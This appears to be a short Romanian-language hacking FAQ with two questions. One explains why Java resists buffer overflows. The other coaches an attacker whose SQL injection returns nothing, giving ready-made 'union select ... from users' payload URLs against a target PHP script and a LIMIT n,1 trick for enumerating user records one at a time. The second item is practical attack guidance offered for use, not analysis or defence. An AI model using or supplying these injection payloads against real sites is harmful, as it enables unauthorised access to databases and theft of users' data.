FAQs - №3

Problema: Este posibil oare ca în programele create în Java să se supraîncarce buffer-ul?

Rezolvare: Nu. Verificatorul bytecode-ului ( bytecode verifier ) scanează bytecode-urile, extrăgînd informaţia despre tipul obiectelor în fiecare punct de executare a fragmentului de cod. Maşina virtuală Java protejează de ieşirea "peste hotarele" memoriei acordate - se face excluderea, cu toate aceste codul introdus nu va fi executat. Nu se poate întîmpla supraîncărcarea sau stack-ului, parametrii pentru instruirea byte-maşinii are tipul necesar, iar permisiunea către cîmpurile şi metodele obiectelor nu încalcă declaraţiile în clasele de reguli (public, private, protected).

_____________________________________________________

Problema: Fac o injectie, însă la ieşire nimic nu se primeste, dar ştiu 100% că boxele există?

Rezolvare: Se pare că trebuie utilizat operatorul LIMIT. Dacă cererea iniţială arată cam în felul următor:

http://target/script.php?p=-1 union select 1,2,user,4 from users/*

atunci adaugă limit şi încearcă (enumeră) n-urile:

http://target/script.php?p=-1 union select 1,2,user,4 from users limit n,1/*

unde n de la 0 la 9.